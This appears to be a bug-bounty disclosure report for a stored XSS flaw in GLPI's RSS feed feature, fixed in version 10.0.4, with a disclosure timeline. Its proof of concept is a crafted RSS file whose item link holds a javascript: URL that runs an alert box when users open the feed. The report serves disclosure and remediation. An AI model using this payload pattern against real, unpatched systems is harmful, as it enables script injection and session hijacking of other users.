Stored XSS - XSS in RSS link in glpi-project/glpi

Valid

Reported on

Oct 27th 2022


Description

An Administrator can import a malicious RSS feed that contains Cross Site Scripting (XSS) payloads inside RSS links. The administrator can then make the RSS feed available to all users of the software. Victims who wish to visit an RSS content will execute the Javascript code in a new tab.

Proof of Concept

1. Create a malicious RSS feeds

The XSS payload is inside link attribute, value :

<link>javascript:alert(`XSS in RSS link !`)</link>

Content of xss.rss :

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
        <channel>
                <title>toto</title>
                <description>This is a simplified example of the RSS feed</description>
                <link>https://blog.fileformat.com/</link>
                <copyright>2021 fileformat.com All rights reserved</copyright>
                <lastBuildDate>Wed, 22 Jun 2021 00:01:00 +0000</lastBuildDate>
                <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate>
                <ttl>1800</ttl>
                <item>
                        <title>Example entry</title>
                        <description>Here is some text containing an interesting description.</description>
                        <link>javascript:alert(`XSS in RSS link !`)</link>
                        <guid isPermaLink="false">9bd605d5-1921-8i67-dgft-65g635d3587u</guid>
                        <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate>
                </item>
        </channel>
</rss>

2. Add RSS feed

Add RSS feed

3. Change the visibility of the RSS feed to public

Change the visibility of the RSS feed to public

4. Observer account can view the XSS

Observer account can view the XSS

5. XSS is executed

XSS is executed

5. Other accounts like Self-service can also view and execute the XSS

Other accounts like Self-service can also view and execute the XSS

Impact

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, or modifying presentation of content. An XSS vulnerability allowing an attacker to modify a press release or news item could affect a company’s stock price or lessen consumer confidence. An XSS vulnerability on a pharmaceutical site could allow an attacker to modify dosage information resulting in an overdose. Source OWASP - Cross Site Scripting (XSS).

References

We are processing your report and will contact the glpi-project/glpi team within 24 hours. a month ago
xanhacks modified the report
a month ago
We have contacted a member of the glpi-project/glpi team and are waiting to hear back a month ago
We have sent a follow up to the glpi-project/glpi team. We will try again in 7 days. a month ago
glpi-project/glpi maintainer has acknowledged this report a month ago
Cédric Anne validated this vulnerability a month ago
xanhacks has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Cédric Anne marked this as fixed in 10.0.4 with commit 071c4e a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Cédric Anne published this vulnerability a month ago
RSSFeed.php#L1078 has been validated
to join this conversation